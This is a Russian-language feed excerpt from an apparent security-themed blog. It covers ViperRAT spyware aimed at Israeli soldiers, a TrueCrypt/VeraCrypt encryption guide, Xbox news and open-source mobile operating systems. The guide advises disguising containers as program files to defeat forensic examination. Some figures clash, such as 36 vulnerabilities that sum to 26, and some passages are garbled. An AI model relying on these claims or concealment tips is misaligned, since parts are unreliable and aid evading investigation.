  &lt;p&gt;По данным антивирусных компаний, сотрудники Армии обороны Израиля были взломаны с помощью методов, всеми нами любимой социальной инженерии — где солдаты были прикормлены через мессенджер Facebook и других социальных сетях. Хакеры, выдавали себя за привлекательных женщин из разных стран, как Канада, Германия и Швейцария,Мехико.&lt;/p&gt;
  &lt;p&gt;Далее «девушки» отказывались, продолжать диалог в соц. сетях, под предлогом, что мол «не удобно ей писать, через Facebook» или же «нету возможности писать через соц сети». Им скидывали приложения, под видом SR Chat. А те же, с удовольствием, не думая скачали приложение, лишь бы продолжить диалог с сочной латинкой(например).&lt;/p&gt;
  &lt;p&gt;Вредоносная программа также распространяется с помощью «капельницы», скрытая в других приложениях на Android, включая игры в бильярд, израильские Песни, и переход к iOS-приложения, которые являются общими для израильских граждан и доступна в магазине Google Play.&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2017/03/android-malware-attack.png&quot; width=&quot;840&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Затем, сразу же приходило уведомление обновления для одного из уже установленных приложений, таких как &lt;strong&gt;whatsapp.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Это, в свою очередь, позволило злоумышленникам выполнить по командам спрос, позволяя им контроль микрофон и камеры телефона, подслушивать разговоры солдат, и смотреть видео с камер.&lt;/p&gt;
  &lt;p&gt;Кроме этого, &lt;strong&gt;ViperRAT&lt;/strong&gt; (вредоносная программа) собирает широкий спектр данных с вашего устройства, включая геолокацию, журнал звонков, личные фотографии, SMS-сообщения, информацию, сотовую связь, мобильный интернет, метаданные устройства, просмотр интернет-страниц, и история скаченных приложений.&lt;/p&gt;
  &lt;p&gt;По данным исследователей, хакеры смогли успешно создать широкую кампанию кибер шпионажа, приносящая ущерб десяткам мобильным устройствам от Samsung, HTC, LG и Huawei, принадлежащих к более чем 100 израильских солдат.&lt;/p&gt;
  &lt;p&gt;ViperRAT атаки начались в июле и продолжаются по сей день, по мнению исследователей из Лаборатории Касперского.&lt;/p&gt;

</content></entry><entry><id>saveandbetray:SyenYnCOKV</id><link rel="alternate" type="text/html" href="https://teletype.in/@saveandbetray/SyenYnCOKV?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=saveandbetray"></link><title>Азы безопасности: шифрование данных</title><published>2019-04-08T14:36:52.170Z</published><updated>2019-04-08T14:36:52.170Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/84/846b24ed-0466-4c60-810d-f793b25560ba.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/28/282b10e9-3573-46c1-a31b-d491aadbb4b8.jpeg&quot;&gt;Наш telegram канал : @Save and betray</summary><content type="html">
  &lt;p&gt;Наш telegram канал : &lt;a href=&quot;https://tele.gg/save_and_betray&quot; target=&quot;_blank&quot;&gt;@Save and betray&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://tele.gg/joinchat/KIpU6VBtZBYfLi_02wRozg&quot; target=&quot;_blank&quot;&gt;Вступай в наши ряды&lt;/a&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/28/282b10e9-3573-46c1-a31b-d491aadbb4b8.jpeg&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;&lt;strong&gt;Переход к использованию криптоконтейнеров&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;В рамках этой статьи поговорим о практике использования шифрования для защиты данных. Если вам пока сложно воспринимать слово криптоконтейнер, читайте вместо него «надёжно зашифрованная папка с паролем, где можно хранить и редактировать файлы». Криптоконтейнер — это надежный сейф внутри вашего компьютера.&lt;/p&gt;
  &lt;p&gt;Я на своем примере расскажу о начале применения криптоконтейнеров, а вы, опираясь на мой опыт, настроите работу криптоконтейнеров на компьютере или мобильном устройстве. Как у многих из вас, файлы у меня были разложены по папкам.&lt;/p&gt;
  &lt;p&gt;Я всегда пытался навести порядок на своем компьютере: у меня была папка «Работа» с множеством вложенных папок, была папка «Учёба» с образовательными материалами, были различные папки с фотографиями, видео и всяким хламом. Была, конечно, и папка XXX, предусмотрительно переименованная в «Лекции».&lt;/p&gt;
  &lt;p&gt;Общий объём файлов составлял порядка 112 ГБ. При переходе к использованию криптоконтейнеров я разделил файлы на три группы.&lt;/p&gt;
  &lt;p&gt;В первую группу вошли очень ценные для меня файлы, но которые я не использую ежедневно. Во вторую вошли важные файлы, которые используются мной каждый день для работы или учебы. В третью вошёл всякий хлам, который я даже не думал как-то защищать и перенёс в криптоконтейнер только ради общего порядка. Есть одно общее правило: чем меньше у вас файлов в криптоконтейнере, тем лучше с точки зрения безопасности. Когда вы монтируете криптоконтейнер, в котором лежит десять файлов, то открываете доступ ко всем десяти из-за одного. В идеале на каждый файл должен быть отдельный криптоконтейнер, но на практике это несбыточная утопия. Когда файлы находятся в несмонтированном криптоконтейнере, они надёжно защищены. Забросят ли вам на компьютер трояна или, вынеся дверь, проведут криминалистический анализ — всё это бесполезно при надёжном пароле. Если, конечно, вы сами не выдадите его, или он у вас не сохранен в txt документе на рабочем столе. О способах взлома криптоконтейров мы подробно расскажем в заключительном параграфе.&lt;/p&gt;
  &lt;p&gt;Думаю, стоит детальнее объяснить, что такое смонтированный криптоконтейнер. Представьте, что криптоконтейнер — это зашифрованная папка с паролем. Вы ввели пароль и пользуетесь находящимися там файлами, потом вы закрыли папку, и для доступа к данным снова нужен пароль. В состоянии, когда вы пароль уже ввели, и доступ открыт, троянская программа, попавшая на ваш компьютер, или третье лицо, получившее доступ к компьютеру, имеют доступ и к файлам. Это называется смонтированным криптоконтейнером, а сам процесс введения пароля и открытие доступа — монтирование. Криптоконтейнер можно сравнить с сейфом. Сейф защищён, только когда закрыт. В открытом состоянии любой может получить доступ к его содержимому. Хранить вещи в открытом сейфе ничуть не безопаснее, нежели на столе рядом с ним.&lt;/p&gt;
  &lt;p&gt;Совет: создавайте как можно больше криптоконтейнеров. Хранить все данные в одном криптоконтейнере небезопасно. Вернёмся к моим криптоконтейнерам. Я создал криптоконтейнеры, создал резервную копию файлов (на всякий случай) и перенёс файлы в созданные криптоконтейнеры. Весь хаос папок и файлов на моём жёстком диске преобразовался в три надёжно зашифрованных файла. Всё просто: вы продумываете, сколько криптоконтейнеров вам понадобится, создаёте их и переносите в них файлы. Перенос данных в криптоконтейнеры — один из важнейших шагов на пути к построению защищённой системы.&lt;/p&gt;
  &lt;p&gt;Совет: храните всю информацию только в криптоконтейнерах. У криптоконтейнера есть ещё одно преимущество. Например, вам надо экстренно уничтожить ваши данные, занимающие 100 ГБ жесткого диска. Сколько времени будет происходить удаление их безопасным способом? В зависимости от возможностей жёсткого диска это может занять до 30 минут.&lt;/p&gt;
  &lt;p&gt;А если эти 100 ГБ будут в криптоконтейнере, то с помощью технологии CryptoCrash данные можно уничтожить за несколько секунд. В следующих параграфах мы познакомим вас с программами, позволяющими создавать и использовать криптоконтейнеры.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;История TrueCrypt&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;TrueCrypt — почти образцовая программа шифрования папок и файлов. Первая версия программы вышла в свет ещё в далеком 2004 году, и на тот момент TrueCrypt оказалась фактически единственной программой с открытым исходным кодом для шифрования «на лету». Что значит «на лету»? Обычные программы для работы с зашифрованными файлами требуют сначала расшифровать файл или папку, выполнив необходимые манипуляции с данными, затем создать зашифрованную копию файла или папки, а незашифрованный оригинал удалить. TrueCrypt позволяла создавать зашифрованную папку, указав в программе пароль, и работать с зашифрованной папкой, шифруя и расшифровывая данные «на лету». С 2004 по 2014 программа TrueCrypt регулярно обновлялась. Некоторые функции исключались. Так, например, была убрана поддержка дискет, когда этот формат канул в лету, удалялись и некоторые протоколы шифрования.&lt;/p&gt;
  &lt;p&gt;С развитием компьютерной индустрии совершенствовались и технологии взлома методов шифрования, из-за этого ряд протоколов перестал считаться надёжным. Так, в последней, 7-й, версии TrueCrypt вы уже не увидите протоколов шифрования с размером блока в 64 бита (Тройной DES, Blowfish, CAST5).&lt;/p&gt;
  &lt;p&gt;Десять лет проект TrueCrypt активно развивался и превратился в фундаментальный софт для защиты данных. Всё это время имена разработчиков программы оставались загадкой, что породило ряд слухов о причастности спецслужб к разработке приложения.&lt;/p&gt;
  &lt;p&gt;Некоторые говорили, что программа разработана ФБР, другие утверждали, что если и не ФБР, то в софте непременно есть закладки. Популярность TrueCrypt росла, пока весной 2014 года не произошло необъяснимое событие, повергшее интернет-общественность в шок. 28 мая 2014 проект TrueCrypt был закрыт. Точные причины закрытия проекта никому не известны по сей день. Сами разработчики сообщили на официальном сайте, что использование TrueCrypt небезопасно, и предложили переходить на BitLocker, который всегда высмеивали. Есть много версий и догадок о случившемся, мы приведём основные.&lt;/p&gt;
  &lt;p&gt;Первая версия гласит, что разработчикам угрожали спецслужбы, вторая — что их переманили на работу в Microsoft, чем и объясняется реклама BitLocker, третья — им надоело продвигать и поддерживать проект, не приносящий денег, четвертая — они действительно обнаружили в продукте критическую уязвимость, которую не способны были исправить. Интернет-сообщество погрузилось в споры о безопасности TrueCrypt, и одному Богу известно, сколько бы они продлились, если бы к началу апреля 2015 не был завершен независимый аудит TrueCrypt, на который было собрано свыше 60 000 USD пожертвований. Он не выявил никаких уязвимостей или серьёзных недостатков в архитектуре приложения и показал, что TrueCrypt является хорошо спроектированной криптографической программой. Источник: &lt;a href=&quot;https://opencryptoaudit.org/reports/TrueCrypt_Phase_II_NCC_OCAP_final.pdf&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt;. Мы считаем, что, TrueCrypt 7.1 надежен, и закрытие проекта не связано с его безопасностью. А вот хронологически последняя версия программы (7.2) не является безопасной и полнофункциональной, по крайней мере, об этом предупреждают сами разработчики, и это мнение разделяют многие эксперты.&lt;/p&gt;
  &lt;p&gt;Потому мы рекомендуем использовать последнюю стабильную и надежную версию — TrueCrypt 7.1а. TrueCrypt&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Недоказуемость криптоконтенейра&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;У TrueCrypt масса преимуществ, одно из которых заключается в невозможности идентифицировать зашифрованный контейнер. Даже если недоброжелатели получат доступ к вашему диску, укажут на криптоконтейнер и скажут «это — криптоконтейнер», вы смело можете сказать, что это не так, что это какой-то неизвестный вам файл. Доказать обратное невозможно. Разумеется, вы можете «случайно» прищемить палец дверью и тогда не только признаете в файле криптоконтейнер, но и вспомните пароль. Но и от этого есть защита, о которой мы расскажем в главе, посвященной антикриминалистике, а сейчас просто запомните, что доказать наличие криптоконтейнера исследованием файла невозможно. Опираясь на это, мы рекомендуем вам называть свои контейнеры как-нибудь нейтрально и пробовать их маскировать под программные файлы. Например, открываем у себя папку с менеджером паролей KeePassX и видим какие-то непонятные файлы с расширением *.dll. Создавая криптоконтейнер, назовем его LsQN7.dll и положим в эту папку. Только мы будем знать, что LsQN7.dll на самом деле криптоконтейнер. После создания криптоконтейнера и размещения его в папке KeePassX. Вы видите отличия? Только дата? Менять дату мы вас научим в части, посвященной маскировке криптокойнтейнеров. Но не спешите создавать криптоконтейнер. Совет Называйте криптоконтейнеры так, чтобы название не выдавало криптоконтейнер. Указывайте у криптоконтейнеров расширение *.dat и размещайте в папке с другими файлами с расширением *.dat.&lt;/p&gt;
  &lt;p&gt;Хотим предупредить, что наличие на рабочем компьютере TrueCrypt действует на некоторых недоброжелателей, как красная тряпка на быка. У вас сразу начинают искать криптоконтейнеры, требовать пароли, а вам приписывать различные криминальные намерения от торговли ПАВ до поддержки международного терроризма.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;VeraCrypt&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Вот уже четыре года как проект TrueCrypt — легендарный софт для шифрования данных — не поддерживается разработчиками. Но TrueCrypt — программа с открытым исходным кодом, и любой на его основе может начать разрабатывать свой продукт. Именно так поступил француз Мунир Идрасси, летом 2013 представив миру проект VeraCrypt. Основной идей было создание более безопасного, чем TrueCrypt, решения. Например, в TrueCrypt использовалась довольно посредственная генерация ключа, по мнению экспертов, не способная обеспечить высокий уровень защиты против имеющихся в арсенале спецслужб компьютерных мощностей.&lt;/p&gt;
  &lt;p&gt;VeraCrypt предложил ощутимо более устойчивое против брутфорса решение, о котором мы подробнее расскажем, когда дойдем до сравнения программ. При «живом» TrueCrypt форки не пользовались популярностью; все изменилось, когда весной 2014 года разработчики TrueCrypt сообщили о прекращении поддержки проекта. Тогда о VeraCrypt заговорили как о надежной альтернативе TrueCrypt (хотя были и другие форки, такие как GostCrypt, CipherShed например). Часть пользователей TrueCrypt сразу перешла на использование VeraCrypt, а часть осталась верна TrueCrypt.&lt;/p&gt;
  &lt;p&gt;Многим понравился VeraCrypt, однако нашлось и немало критиков. В сети активно поддерживалась версия, что VeraCrypt — проект спецслужб, имеющий закладки. Многие относятся к форкам с большой долей скептицизма, этого же мнения придерживаются и разработчики TrueCrypt, считая форк опасным. В основе их опасения лежит убеждение в неспособности сторонних разработчиков до конца разобраться с их кодом, и, как вы узнаете дальше, эти опасения были не напрасны.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;VeraCrypt vs TrueCrypt&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Давайте сравним TrueCrypt и VeraCrypt. Эти программы очень близки по функционалу и дизайну, что неудивительно для форка и оригинала, потому мы сравним быстродействие и безопасность. Скорость монтирования криптоконтейнеров.&lt;/p&gt;
  &lt;p&gt;Первый негативный момент, с которым сталкиваются пользователи TrueCrypt, первый раз попробовав VeraCrypt, — время монтирования криптоконтейнера. Когда в TrueCrypt вы указываете верный пароль, время ожидания до доступа к зашифрованным данным составляет на современном компьютере десятые доли секунды. При использовании VeraCrypt ждать приходится заметно дольше. TrueCrypt vs VeraCrypt&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Устойчивость к брутфорсу&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Брутфос, если говорить простыми словами, — попытка подобрать пароль (ключ) путем перебора всех возможных вариантов. Современные суперкомпьютеры, имеющиеся в распоряжении спецслужб, умеют перебирать варианты очень быстро. За счёт более совершенного метода генерации ключей VeraCrypt от 10 до 300 раз более устойчив к атакам прямого перебора. Для многих это самое главное преимущество VeraCrypt. Поддержка со стороны разработчиков. TrueCrypt уже не поддерживается разработчиками, используемые решения устаревают с каждым днем, потенциальные уязвимости не исправляются. Это безусловно плюс для VeraCrypt, который активно поддерживается и развивается.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;TrueCrypt vs VeraCrypt: уязвимости&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Казалось бы, наличие поддержки со стороны разработчиков должно было обеспечить VeraCrypt преимущество, но на самом деле все наоборот. В главе, посвященной TrueCrypt, мы рассказывали о проведенном аудите программы, который не выявил критических уязвимостей. Подобному аудиту было подвергнуто и программное обеспечение VeraCrypt. По результатам аудита были выявлены 36 уязвимостей, 8 из которых получили статус критических, 3 — умеренных и 15 — незначительных. 8 критических уязвимостей в таком приложении нельзя назвать иначе как катастрофа. С полной версией отчета об аудите вы можете познакомиться по этой ссылке. В настоящий момент большинство обнаруженных уязвимостей успешно исправлены, однако некоторые из них требуют существенной переработки архитектуры и до сих пор присутствуют в VeraCrypt.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;TrueCrypt vs VeraCrypt: уровень команды разработчиков&lt;/strong&gt;&lt;/h3&gt;
  &lt;p&gt;Как было сказано ранее, аудит VeraCrypt обнаружил 8 критических уязвимостей, а при аудите TrueCrypt не было обнаружено ни одной. Это вызывает опасения по поводу уровня команды разработчиков VeraCrypt. У нас нет никаких сомнений, что программное обеспечение TrueCrypt разрабатывалось более компетентными специалистами.&lt;/p&gt;
  &lt;p&gt;Допустим, обнаруженные в ходе аудита 8 критических уязвимостей в VeraCrypt будут закрыты, но где гарантии, что команда разработчиков не допустит еще столько же новых критических уязвимостей? TrueCrypt vs VeraCrypt А какую программу выберете вы?&lt;/p&gt;
  &lt;p&gt;В нашем противостоянии победил TrueCrypt. Но не все так просто. Вы сами должны все взвесить и принять решение. С одной стороны, TrueCrypt использует устаревающие технологии, уступающие в криптостойкости технологиям VeraCrypt. К тому же TrueCrypt больше не поддерживается разработчиками. С другой стороны, VeraCrypt постоянно обновляется и поддерживает более устойчивые к атакам технологии, но обнаруженные уязвимости и вопросы по поводу уровня команды разработчиков дают повод серьезно задуматься. В группе нашей редакции единого мнения нет, но есть единое решение — параллельное использование двух инструментов. Проще говоря, вы создаете один криптоконтейнер, например, при помощи программного обеспечения TrueCrypt, внутри него создаете второй криптоконтейнер при помощи VeraCrypt и уже в нем размещаете файлы. Такая связка в разы надежнее каждой из программ в отдельности.&lt;/p&gt;

</content></entry><entry><id>saveandbetray:rkCngTDY4</id><link rel="alternate" type="text/html" href="https://teletype.in/@saveandbetray/rkCngTDY4?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=saveandbetray"></link><title>Microsoft может объединить подписки Xbox Live и Game Pass в одну общую</title><published>2019-04-07T18:25:58.350Z</published><updated>2019-04-07T18:25:58.350Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/09/09390b7b-b429-4372-9392-2f57eef8e24c.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://3dnews.ru/assets/external/illustrations/2019/04/06/985433/sm.dims.750.jpg&quot;&gt;У Microsoft на сегодняшний день есть два варианта подписок на игры Xbox — Live Gold и Game Pass. Первая предоставляет возможность играть в многопользовательские игры, доступные на консоли. Также для владельцев «Золотого статуса» доступны 2–4 бесплатных игры ежемесячно. Вторая подписка за ежемесячный взнос предоставляет доступ к обширной библиотеке игр (более сотни на данный момент). Из проектов, недавно добавленных в ассортимент, можно отметить Sea of ​​Thieves и Minecraft.</summary><content type="html">
  &lt;p&gt;У Microsoft на сегодняшний день есть два варианта подписок на игры Xbox — Live Gold и Game Pass. Первая предоставляет возможность играть в многопользовательские игры, доступные на консоли. Также для владельцев «Золотого статуса» доступны 2–4 бесплатных игры ежемесячно. Вторая подписка за ежемесячный взнос предоставляет доступ к обширной библиотеке игр (более сотни на данный момент). Из проектов, недавно добавленных в ассортимент, можно отметить Sea of ​​Thieves и &lt;a href=&quot;https://3dnews.ru/984329&quot; target=&quot;_blank&quot;&gt;Minecraft&lt;/a&gt;.&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://3dnews.ru/assets/external/illustrations/2019/04/06/985433/sm.dims.750.jpg&quot; width=&quot;750&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;&lt;em&gt;engadget.com&lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;Но теперь &lt;a href=&quot;https://twitter.com/h0x0d/status/1114159135048646657&quot; target=&quot;_blank&quot;&gt;сообщается&lt;/a&gt;, что компания в скором времени может &lt;a href=&quot;https://www.theverge.com/2019/4/5/18296816/microsoft-xbox-game-pass-ultimate-subscription-pricing-release-date-rumors&quot; target=&quot;_blank&quot;&gt;представить&lt;/a&gt; новую подписку Xbox Game Pass Ultimate, которая объединит оба варианта и будет стоить $15 в месяц (цена в России пока не объявлена). Источником выступает инсайдер WalkingCat, который известен своими утечками из внутренней «кухни» Microsoft.&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://3dnews.ru/assets/external/illustrations/2019/04/06/985433/Annotation%202019-04-06%20130528.jpg&quot; width=&quot;504&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;По его словам, участники программы раннего доступа могут получить особую цену на подписку — $1 в месяц вплоть до запуска сервиса.&lt;/p&gt;
  &lt;p&gt;Есть косвенные подтверждения этой информации. Во-первых, аналитик Дэниел Ахмад (Daniel Ahmad) &lt;a href=&quot;https://www.resetera.com/threads/rumor-microsoft-to-introduce-new-xbox-game-pass-ultimate-subscription-14-99-month-for-xbox-live-gold-gamepass.109792/#post-19562475&quot; target=&quot;_blank&quot;&gt;заявил&lt;/a&gt; в обсуждении на Resetera, что компания из Редмонда хочет сделать подписки важным элементом своего бизнеса.&lt;/p&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://3dnews.ru/assets/external/illustrations/2019/04/06/985433/sm.Annotation%202019-04-06%20130819.750.jpg&quot; width=&quot;750&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Во-вторых, ранее &lt;a href=&quot;https://3dnews.ru/984671&quot; target=&quot;_blank&quot;&gt;появилась&lt;/a&gt; информация о сроках выхода Xbox One S All-Digital без дисковода. Такое устройство чисто физически сможет загружать игры только из Сети (ну или с флешек, если хакеры смогут взломать прошивку). Как полагают наблюдатели в отрасли, такая консоль будет дешевле обычной. Также не стоит забывать о потоковом сервисе &lt;a href=&quot;https://3dnews.ru/984145&quot; target=&quot;_blank&quot;&gt;xCloud&lt;/a&gt;, который может быть анонсирован на E3 в начале лета. Хотя его и позиционируют как универсальное решение, с помощью которого можно играть на всех устройствах, очевидно, что  Xbox One S All-Digital будет первой на очереди.&lt;/p&gt;

</content></entry><entry><id>saveandbetray:SkhgTKIKN</id><link rel="alternate" type="text/html" href="https://teletype.in/@saveandbetray/SkhgTKIKN?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=saveandbetray"></link><title>7 мобильных ОС с открытым исходным кодом: могут ли они составить конкуренцию Android?</title><published>2019-04-06T20:32:52.285Z</published><updated>2019-04-06T20:32:52.285Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/f9/f92fe0a9-1bf1-4c3f-90a6-5d7548eb005c.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/1f/1fe3d52b-dc31-4d66-8bb3-06c652f2126a.jpeg&quot;&gt;Наш telegram канал : @Save and betray</summary><content type="html">
  &lt;p&gt;Наш telegram канал : &lt;a href=&quot;https://tele.gg/save_and_betray&quot; target=&quot;_blank&quot;&gt;@Save and betray&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href=&quot;https://tele.gg/joinchat/KIpU6VBtZBYfLi_02wRozg&quot; target=&quot;_blank&quot;&gt;Вступай в наши ряды&lt;/a&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/1f/1fe3d52b-dc31-4d66-8bb3-06c652f2126a.jpeg&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2&gt;&lt;strong&gt;Лучшие альтернативы Android с открытым исходным кодом&lt;/strong&gt;&lt;/h2&gt;
  &lt;h3&gt;&lt;strong&gt;1. Kai OS&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/kaios-official.jpg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Вы знали, что Kai OS претендует на то, чтобы стать третьей крупнейшей мобильной операционной системой в мире? Скорее всего, нет. Что ж, это неудивительно. KaiOS вышла на рынок не так давно — в 2017 году — но за неполные два года стала платформой для огромного количества мобильных телефонов. В чем тут секрет? В отличие от других операционных систем, Kai OS «заточена» не под смартфоны, а под фичерфоны — классические сотовые телефоны, оснащенные продвинутыми опциями. Низкая цена в сочетании с функционалом, присущим «умным» телефонам, обеспечивает фичерфонам достаточно большую популярность.&lt;/p&gt;
  &lt;p&gt;Будучи форком канувшей в лету Firefox OS (см. ниже), Kai OS также базируется на ядре Linux.Оценить потенциал Kai OS можно по тому факту, что недавно Google инвестировал в эту операционную систему 22 миллиона долларов.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;2. Tizen&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/Tizen_os.jpg&quot; width=&quot;700&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Опенсорсная мобильная операционная система Tizen поддерживается сообществом Linux Foundation, из-за чего ее часто называют официальной мобильной ОС Linux. Помимо Linux Foundation, Tizen также поддерживают такие техногиганты, как Samsung и Intel. Релиз первого смартфона с ОС Tizen, Samsung Z, состоялся в январе 2015 года (хотя изначально был запланирован на конец 2013-го) на южно-азиатском рынке. К сожалению, большого успеха на рынке Индии Samsung Z не снискал.&lt;/p&gt;
  &lt;p&gt;Несмотря на то, что операционная система Tizen базируется на ядре Linux, в ней не раз обнаруживали уязвимости. Честно говоря, в будущее данной ОС верится с трудом. Похоже, что рано или поздно Tizen себя изживет.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;3. Plasma Mobile&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/plasma_mobile.jpg&quot; width=&quot;700&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В 2015 году разработчики рабочего стола KDE создали мобильную операционную систему с открытым исходным кодом Plasma Mobile. Приложение основано на ОС Kubuntu и по сути является мобильной версией десктопного пользовательского интерфейса Plasma. При этом Plasma Mobile совместима и с другими операционными системами.&lt;/p&gt;
  &lt;p&gt;Plasma Mobile работает на Nexus 5 и OnePlus One. Мобильная ОС поддерживает виджеты KDE Plasma и позволяет загружать настольные приложения на смартфоне.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;4. postmarketOS&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/postmarketos.jpg&quot; width=&quot;700&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;postmarketOS (сокращенно pmOS) — это предконфигурированная и оптимизированная для сенсорного управления операционная система на базе Alpine Linux с собственными программными пакетами, которые можно устанавливать на смартфоны.&lt;/p&gt;
  &lt;p&gt;Известно, что Android и iOS перестают выпускать обновления для моделей спустя несколько лет. В то же время Linux без проблем работает и на старых компьютерах. Цель postmarketOS — внедрить данный опыт и на мобильной платформе, обеспечив смартфонам 10-летний жизненный цикл.&lt;/p&gt;
  &lt;p&gt;В настоящее время проект находится на стадии разработки, поэтому воспользоваться преимуществами postmarketOS прямо сейчас, скорее всего, не получится.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;5. Librem&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/purism-librem.jpg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Librem — это даже не мобильная операционная система, а безопасный зашифрованный мобильный телефон с открытым исходным кодом, который разработчики Linux-дистрибутива PureOS планируют вывести на рынок в ближайшее время.&lt;/p&gt;
  &lt;p&gt;Устройство получит оптимизированную для сенсорного управления версию PureOS, Debian, Ubuntu, SUSE, Fedora и даже Arch Linux.&lt;/p&gt;
  &lt;p&gt;Librem позиционируется как «телефон, по умолчанию ориентированный на безопасность и конфиденциальность». Смартфон работает на свободном и открытом программном обеспечении, на операционной системе GNU+Linux, и его миссия состоит в том, чтобы «создать утопию свободной разработки в противовес огороженным садам других телефонных провайдеров». Будем наблюдать, удастся ли затея.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;6. LineageOS&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/LineageOS.png&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;LineageOS — это дистрибутив Android, иначе говоря, — пользовательская прошивка. Операционная система пришла на смену гораздо более успешному Android-дистрибутиву CyanogenMod и является его форком.&lt;/p&gt;
  &lt;p&gt;Выпущенная в декабре 2016 года, на сегодняшний день LineageOS поддерживает 178 моделей смартфонов, а количество установок операционной системы, по словам разработчиков, достигло 1,7 миллионов.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;7. /e/ (eelo)&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/gael-with-eelo.jpg&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;/e/ (ранее eelo) — это Android-дистрибутив на основе LineageOS от разработчика Mandrake Linux. Цель проекта — создать не привязанную к Google мобильную операционную систему с открытым исходным кодом. Предполагается, что у ОС будет собственное облако и email-сервис. Платформа /e/ должна появиться в стабильной версии в ближайшее время. Название проекта планируется снова изменить.&lt;/p&gt;
  &lt;h3&gt;&lt;strong&gt;Sailfish OS [закрытый исходный код]&lt;/strong&gt;&lt;/h3&gt;
  &lt;figure class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://helpugroup.ru/wp-content/uploads/2019/04/sailfish_os.jpeg&quot; width=&quot;700&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Когда компания Nokia отказалась от разработки мобильной ОС MeeGo, часть сотрудников решила спасти проект. Предполагалось, что MeeGo будет развивать сообщество Linux Foundation в рамках проекта Tizen, однако последний получил самостоятельное развитие и перестал ассоциироваться с MeeGo. Продолжением MeeGo считается Sailfish OS. В ее основу легла операционная система Mer, ставшая ответвлением MeeGo.&lt;/p&gt;
